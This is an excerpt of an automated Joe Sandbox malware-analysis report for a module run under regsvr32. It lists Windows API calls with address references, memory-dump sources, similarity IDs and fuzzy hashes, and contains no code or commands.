                • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 04BC86CF
                • memcpy.NTDLL(00000018,?,?), ref: 04BC86F8
                • RegisterWaitForSingleObject.KERNEL32(00000010,?,04BDDFF1,00000000,000000FF,00000008), ref: 04BC8737
                • HeapFree.KERNEL32(00000000,00000000), ref: 04BC874A
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Heap$AllocateFreeObjectRegisterSingleWaitmemcpy
                • String ID:
                • API String ID: 2780211928-0
                • Opcode ID: b580bb4a688926db626e543accc926d6c9c5400f14beebd246f3661cae3a13c9
                • Instruction ID: e3d50b95fb37478a6992b20659934c176b2d0fabd7270b5e54c5f4dfb2e7a147
                • Opcode Fuzzy Hash: b580bb4a688926db626e543accc926d6c9c5400f14beebd246f3661cae3a13c9
                • Instruction Fuzzy Hash: 71317370240606AFEB20DF26DC85B9A7BA9FF84321F00456AF925D7290D775E9149BB0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memset.NTDLL ref: 04BD0C9A
                • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 04BD0CDE
                • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 04BD0D21
                • CloseHandle.KERNEL32(?,?,?,?,?), ref: 04BD0D44
                  • Part of subcall function 04BE2449: GetTickCount.KERNEL32 ref: 04BE2459
                  • Part of subcall function 04BE2449: CreateFileW.KERNEL32(04BDA7DD,80000000,00000003,04BEE268,00000003,00000000,00000000,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE2476
                  • Part of subcall function 04BE2449: GetFileSize.KERNEL32(04BDA7DD,00000000,?,00000001,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE24A9
                  • Part of subcall function 04BE2449: CreateFileMappingA.KERNEL32(04BDA7DD,04BEE268,00000002,00000000,00000000,04BDA7DD), ref: 04BE24BD
                  • Part of subcall function 04BE2449: lstrlen.KERNEL32(04BDA7DD,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE24D9
                  • Part of subcall function 04BE2449: lstrcpy.KERNEL32(?,04BDA7DD), ref: 04BE24E9
                  • Part of subcall function 04BE2449: HeapFree.KERNEL32(00000000,04BDA7DD,?,04BDA7DD,00000000,?,04BC78A1,00000000), ref: 04BE2504
                  • Part of subcall function 04BE2449: CloseHandle.KERNEL32(04BDA7DD,?,00000001,?,04BDA7DD), ref: 04BE2516
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
                • String ID:
                • API String ID: 3239194699-0
                • Opcode ID: 05fda6ed70523f3be70b08fb2c642e34cd76b1aa040a851d207a98cc2ea9bc52
                • Instruction ID: fff857d929de3b43de421b6c701f63a51002d2715e32080d6e274f846cc31796
                • Opcode Fuzzy Hash: 05fda6ed70523f3be70b08fb2c642e34cd76b1aa040a851d207a98cc2ea9bc52
                • Instruction Fuzzy Hash: 91216B31500209EBDB21EF66DD44EEE7BB8EF88318F1405A6FD1A971A0E731E945DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEnterCriticalSection.NTDLL(0624C0A0), ref: 04BE5DF1
                • RtlLeaveCriticalSection.NTDLL(0624C0A0), ref: 04BE5E0C
                • GetLastError.KERNEL32(?,?,?), ref: 04BE5E7A
                • GetLastError.KERNEL32(?,?,?), ref: 04BE5E89
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalErrorLastSection$EnterLeave
                • String ID:
                • API String ID: 2124651672-0
                • Opcode ID: cd9342ff6bcbaf1e32b0826d2a3bb0a39fc4029f38127e17fe4f69074f04d8db
                • Instruction ID: 2b573646c02f2bbf4423cddbd15f5ee1aded9aab034fe872a9e3928db77fdd68
                • Opcode Fuzzy Hash: cd9342ff6bcbaf1e32b0826d2a3bb0a39fc4029f38127e17fe4f69074f04d8db
                • Instruction Fuzzy Hash: 28212C36500209EFCB21DFAAD844EAEBBB8FF88714F158596F805A7250D734EE15DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                  • Part of subcall function 04BCE9B0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,04BDBCFE), ref: 04BCE9D6
                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 04BDBD39
                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,04BD6B93,?), ref: 04BDBD4B
                • ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,04BD6B93,?), ref: 04BDBD63
                • CloseHandle.KERNEL32(?,?,?,?,?,?,04BD6B93,?), ref: 04BDBD7E
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: File$CloseCreateHandleModuleNamePointerRead
                • String ID:
                • API String ID: 1352878660-0
                • Opcode ID: d991cd0ce88972db95439c61611ab8f54562f64a7c77f9022e91fe6a19c78801
                • Instruction ID: 59c1a25e2c6295ec0d041cdbebb30411eb2175f2c2b6eaa2662d047e65433502
                • Opcode Fuzzy Hash: d991cd0ce88972db95439c61611ab8f54562f64a7c77f9022e91fe6a19c78801
                • Instruction Fuzzy Hash: 36115E71500118BADF20AFA5CC88EEFBE6DEF45794F104195F912E6090E370AA40DAA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(8B000000,04BCB526,?,04BCB526,00000004), ref: 04BD4DA4
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • lstrcpy.KERNEL32(00000000,8B000000), ref: 04BD4DBB
                • StrChrA.SHLWAPI(00000000,0000002E,?,04BCB526,00000004), ref: 04BD4DC4
                • GetModuleHandleA.KERNEL32(00000000,?,04BCB526,00000004), ref: 04BD4DE2
                  • Part of subcall function 04BD8CCE: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,00000000,00000005,?,00000000,8B000000,?,00000004,00000000,00000004,00000002,00000000,?), ref: 04BD8DA5
                  • Part of subcall function 04BD8CCE: VirtualProtect.KERNELBASE(04BCB73B,00000004,00000002,00000002,?,00000004,00000000,00000004,00000002,00000000,?,00000000,00000000,04BEA580,0000001C,04BDBB7F), ref: 04BD8DC0
                  • Part of subcall function 04BD8CCE: RtlEnterCriticalSection.NTDLL(04BEE480), ref: 04BD8DE4
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
                • String ID:
                • API String ID: 105881616-0
                • Opcode ID: a944063edb79ada810eb74ad0efd5f12731b6369be5256e1f53f3d08a7df610a
                • Instruction ID: 5f1775ab1e4695cd2b5541d69c3b1ede46e9b79ec2ffba620aa01ffe65bd5aaa
                • Opcode Fuzzy Hash: a944063edb79ada810eb74ad0efd5f12731b6369be5256e1f53f3d08a7df610a
                • Instruction Fuzzy Hash: 05216F34A00205EFDB14EF65C988BAEBBF9FF84304F1084DAE4159B251E7B4EA41DB61
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RegOpenKeyA.ADVAPI32(80000001,00000008,00000008), ref: 04BD6E15
                • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,00000008,?,00000008), ref: 04BD6E39
                • RegCloseKey.ADVAPI32(00000008,?,00000008), ref: 04BD6E91
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,?,00000000,?,00000008), ref: 04BD6E62
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: QueryValue$AllocateCloseHeapOpen
                • String ID:
                • API String ID: 453107315-0
                • Opcode ID: 0631579d0ba0d1b43bb4fe692cd78beac75680a578eb0cbd0c5c199b4e1293ef
                • Instruction ID: ec57c51c9623cdbc24133ee281cf84ad61bc2b5c85f0fbd7a803e343298d15ec
                • Opcode Fuzzy Hash: 0631579d0ba0d1b43bb4fe692cd78beac75680a578eb0cbd0c5c199b4e1293ef
                • Instruction Fuzzy Hash: F121EA7590010DFFDB119F99C9808EEBBBDEF84340F104996F801AB110E771AA95DB60
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(?), ref: 04BDA478
                • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 04BDA49E
                • lstrcpy.KERNEL32(00000014,?), ref: 04BDA4C3
                • memcpy.NTDLL(?,?,?), ref: 04BDA4D0
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: AllocateHeaplstrcpylstrlenmemcpy
                • String ID:
                • API String ID: 1388643974-0
                • Opcode ID: 23c6d03edf277bb5afdea9e5d4d506d413039368c205bbe86add8951ab56c56c
                • Instruction ID: 71534a89897a514ae7dab43d1f55bdea8cf3ebc5731eb0492a0c0ed2bd297c0d
                • Opcode Fuzzy Hash: 23c6d03edf277bb5afdea9e5d4d506d413039368c205bbe86add8951ab56c56c
                • Instruction Fuzzy Hash: 2C11467150160AEFCB21DF58D884E9ABBF8FB48714F1084AAF85A8B611D775E904DFA0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,04BDAB7C,?,00000000,00000000), ref: 04BC27C8
                • lstrlen.KERNEL32(0624BF48,?,04BDAB7C,?,00000000,00000000), ref: 04BC27E9
                • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 04BC2801
                • lstrcpy.KERNEL32(00000000,0624BF48), ref: 04BC2813
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                • String ID:
                • API String ID: 1929783139-0
                • Opcode ID: 409fa8c217e46e2008ed1a4f99bce905b9332c581a4db1805fa47a55342894c2
                • Instruction ID: cc151709c5c57f2e0a9d3392602c8f5c9d07dd2ce33b530e592e1aa0a65b0a71
                • Opcode Fuzzy Hash: 409fa8c217e46e2008ed1a4f99bce905b9332c581a4db1805fa47a55342894c2
                • Instruction Fuzzy Hash: 9101C876904644EBD311EBADE8C4E5FBBBCEB88201F0440AAE909D7201D634DE08C771
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEnterCriticalSection.NTDLL(04BEE4A8), ref: 04BD06CA
                • Sleep.KERNEL32(0000000A,?,?,?,04BC8E76,00000000,?,00000029,04BEE218,04BC7EA7,?), ref: 04BD06D4
                • SetEvent.KERNEL32(?,?,?,04BC8E76,00000000,?,00000029,04BEE218,04BC7EA7,?), ref: 04BD072B
                • RtlLeaveCriticalSection.NTDLL(04BEE4A8), ref: 04BD074A
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalSection$EnterEventLeaveSleep
                • String ID:
                • API String ID: 1925615494-0
                • Opcode ID: f86d87b0bd1f8bda02972fcf9824c44a07e131568beafd40dff071b8cd939d14
                • Instruction ID: 94311583dfb377fea2216b0816556f7bf9a5c9db190f9fc4bdad729a80039e19
                • Opcode Fuzzy Hash: f86d87b0bd1f8bda02972fcf9824c44a07e131568beafd40dff071b8cd939d14
                • Instruction Fuzzy Hash: 1B015271640205ABF700BBA6DC49B5A37A8EB95715F004492F609EF081E7B9ED009BB1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • InterlockedExchange.KERNEL32(04BEE0E0,00000000), ref: 04BE2608
                • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 04BE2623
                • lstrcpy.KERNEL32(00000000,?), ref: 04BE264C
                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04BE266D
                  • Part of subcall function 04BD1D5B: SetEvent.KERNEL32(?,?,04BCCE97), ref: 04BD1D70
                  • Part of subcall function 04BD1D5B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,04BCCE97), ref: 04BD1D90
                  • Part of subcall function 04BD1D5B: CloseHandle.KERNEL32(00000000,?,04BCCE97), ref: 04BD1D99
                  • Part of subcall function 04BD1D5B: CloseHandle.KERNEL32(?,?,?,04BCCE97), ref: 04BD1DA3
                  • Part of subcall function 04BD1D5B: RtlEnterCriticalSection.NTDLL(?), ref: 04BD1DAB
                  • Part of subcall function 04BD1D5B: RtlLeaveCriticalSection.NTDLL(?), ref: 04BD1DC3
                  • Part of subcall function 04BD1D5B: CloseHandle.KERNEL32(?), ref: 04BD1DDF
                  • Part of subcall function 04BD1D5B: LocalFree.KERNEL32(?), ref: 04BD1DEA
                  • Part of subcall function 04BD1D5B: RtlDeleteCriticalSection.NTDLL(?), ref: 04BD1DF4
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                • String ID:
                • API String ID: 1103286547-0
                • Opcode ID: 4b6ed92d02e90b3490e36dff5cae2a02e8ed0560f2a2200be409a04c67c954b6
                • Instruction ID: 95def3625beaf5fb83b43bce408dcde4b63ca17add71b81348290fac46f5a96c
                • Opcode Fuzzy Hash: 4b6ed92d02e90b3490e36dff5cae2a02e8ed0560f2a2200be409a04c67c954b6
                • Instruction Fuzzy Hash: 82F0F431740211A7E6207A33BC0AF163F28EBC4720F0005A2F204AF192CB65EC05C770
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(00000000,00000000,00000000,04BD983E,?,00000000,?,?,00000000,?,?,00000000,?,?,00000000), ref: 04BCAD6A
                • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 04BCAD7F
                • wsprintfA.USER32 ref: 04BCAD9B
                  • Part of subcall function 04BE2BDD: memset.NTDLL ref: 04BE2BF2
                  • Part of subcall function 04BE2BDD: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 04BE2C2B
                  • Part of subcall function 04BE2BDD: wcstombs.NTDLL ref: 04BE2C35
                  • Part of subcall function 04BE2BDD: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 04BE2C66
                  • Part of subcall function 04BE2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04BDFD2F), ref: 04BE2C92
                  • Part of subcall function 04BE2BDD: TerminateProcess.KERNEL32(?,000003E5), ref: 04BE2CA8
                  • Part of subcall function 04BE2BDD: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,04BDFD2F), ref: 04BE2CBC
                  • Part of subcall function 04BE2BDD: CloseHandle.KERNEL32(?), ref: 04BE2CEF
                  • Part of subcall function 04BE2BDD: CloseHandle.KERNEL32(?), ref: 04BE2CF4
                • HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 04BCADB7
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CloseHandleHeapMultipleObjectsProcessWaitlstrlen$AllocateCreateFreeTerminatememsetwcstombswsprintf
                • String ID:
                • API String ID: 1624158581-0
                • Opcode ID: f59cb0acda8e0b655c64780e372edf3f5660cb596b7c8662b9d20879b62f67ac
                • Instruction ID: 68973eac93a101c31d48a518f4cba54c5231159887716fc4a8bc9f7e844417d5
                • Opcode Fuzzy Hash: f59cb0acda8e0b655c64780e372edf3f5660cb596b7c8662b9d20879b62f67ac
                • Instruction Fuzzy Hash: 57F0E232600515BBD6216B3BFC09FAB7B6DDBC1B21F150166F801EB292D768DC059AB0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEnterCriticalSection.NTDLL(0624C0A0), ref: 04BE365E
                • Sleep.KERNEL32(0000000A), ref: 04BE3668
                • HeapFree.KERNEL32(00000000), ref: 04BE3696
                • RtlLeaveCriticalSection.NTDLL(0624C0A0), ref: 04BE36AB
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                • String ID:
                • API String ID: 58946197-0
                • Opcode ID: 7ae93c0ca8af9c469399d3eca1d0a8fd5caca2ab721819997449e488390b02ad
                • Instruction ID: 4b93d82afcff71c94d8a787bebefc51992bcdfddcc71f8f35d31a688d7425d43
                • Opcode Fuzzy Hash: 7ae93c0ca8af9c469399d3eca1d0a8fd5caca2ab721819997449e488390b02ad
                • Instruction Fuzzy Hash: 13F0BC74204200DFEB08AB3AE88AE2977B4EBC9740B04809AF8029B351D738FC548A35
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • memcpy.NTDLL(?,?,?), ref: 04BDD80B
                • StrToIntExA.SHLWAPI(00007830,00000001,00000001), ref: 04BDD81D
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: memcpy
                • String ID: 0x
                • API String ID: 3510742995-3225541890
                • Opcode ID: 00d8baef54a5e4230130bc26209dd4668cc579f836633ee802b2153153aa227a
                • Instruction ID: 1a7530a949bee25c680610c150edd6f9642565db64e4a6cab3c331f88cc7f137
                • Opcode Fuzzy Hash: 00d8baef54a5e4230130bc26209dd4668cc579f836633ee802b2153153aa227a
                • Instruction Fuzzy Hash: BC017535A0050ABFDB01DF69C805AEEB7BDEB44340F0044A5E904E7150E7B5EA09C791
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: memset
                • String ID:
                • API String ID: 2221118986-0
                • Opcode ID: 2fdc8b8ec5263ab08c97fb3e56e95521d069e90b101dd98ead3febb691c08dda
                • Instruction ID: d659cab81ce14a91e9a04e93eee3505a86a3f23826ef7f082d5d7c2df3f9e4ca
                • Opcode Fuzzy Hash: 2fdc8b8ec5263ab08c97fb3e56e95521d069e90b101dd98ead3febb691c08dda
                • Instruction Fuzzy Hash: 77218872601919BBDB349F60DCC096ABB29FF08304B0005ACEA4586C10D732F9B19B91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,04BCCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000,?,?,04BC567E), ref: 04BC7560
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                  • Part of subcall function 04BE64E1: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,04BC758E,00000000,00000001,00000001,?,?,04BCCB3C,00000000,00000000,74E48170,00000008,0000EA60), ref: 04BE64EF
                  • Part of subcall function 04BE64E1: StrChrA.SHLWAPI(?,0000003F,?,?,04BCCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000,?,?,04BC567E,?,?), ref: 04BE64F9
                • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04BCCB3C,00000000,00000000,74E48170,00000008,0000EA60,00000000), ref: 04BC75BE
                • lstrcpy.KERNEL32(00000000,74E48170), ref: 04BC75CE
                • lstrcpy.KERNEL32(00000000,00000000), ref: 04BC75DA
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                • String ID:
                • API String ID: 3767559652-0
                • Opcode ID: ea4e83eb203a99b09cac8734bc8edc5633c14d342cb2104c9b20aee6a9d35187
                • Instruction ID: 3b5c66884ae79209940aa3fd5201fc9e1b64383e31737cbfae350e18944cfe4d
                • Opcode Fuzzy Hash: ea4e83eb203a99b09cac8734bc8edc5633c14d342cb2104c9b20aee6a9d35187
                • Instruction Fuzzy Hash: 1F21A272500216EFDB126F79C884EAF7FB8EF45294B048099FD059B201EB75EA008BF0
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • lstrlen.KERNEL32(69B25F44,?,?,00000000,04BC357F,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 04BC1D23
                • lstrlen.KERNEL32(?,?,?,00000000,04BC357F,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 04BC1D28
                  • Part of subcall function 04BC8F9E: RtlAllocateHeap.NTDLL(00000000,?,04BC2180), ref: 04BC8FAA
                • memcpy.NTDLL(00000000,?,00000000,?,?,?,00000000,04BC357F,00000000,?,?,00000000,69B25F44,?,?,?), ref: 04BC1D44
                • lstrcpy.KERNEL32(00000000,?), ref: 04BC1D62
                Memory Dump Source
                • Source File: 00000003.00000002.518664353.0000000004BC0000.00000040.10000000.00040000.00000000.sdmp, Offset: 04BC0000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_4bc0000_regsvr32.jbxd
                Similarity
                • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                • String ID:
                • API String ID: 1697500751-0
                • Opcode ID: c3ca6643cf667668516ff30a6ec3cfef66dcd0ef8e2da8321d2addd19cfc43b9
                • Instruction ID: b61f289b07a9cffa4a9bc38b7d7f25d7bf87d7ef1f9e172ea680b2d31dcd540f
                • Opcode Fuzzy Hash: c3ca6643cf667668516ff30a6ec3cfef66dcd0ef8e2da8321d2addd19cfc43b9
                • Instruction Fuzzy Hash: E8F0F6B7400B41FBD731AB6E9C88E1BBB99EFC5311B04459AE94493111D735E414DFB1
                Uniqueness

                Uniqueness Score: -1.00%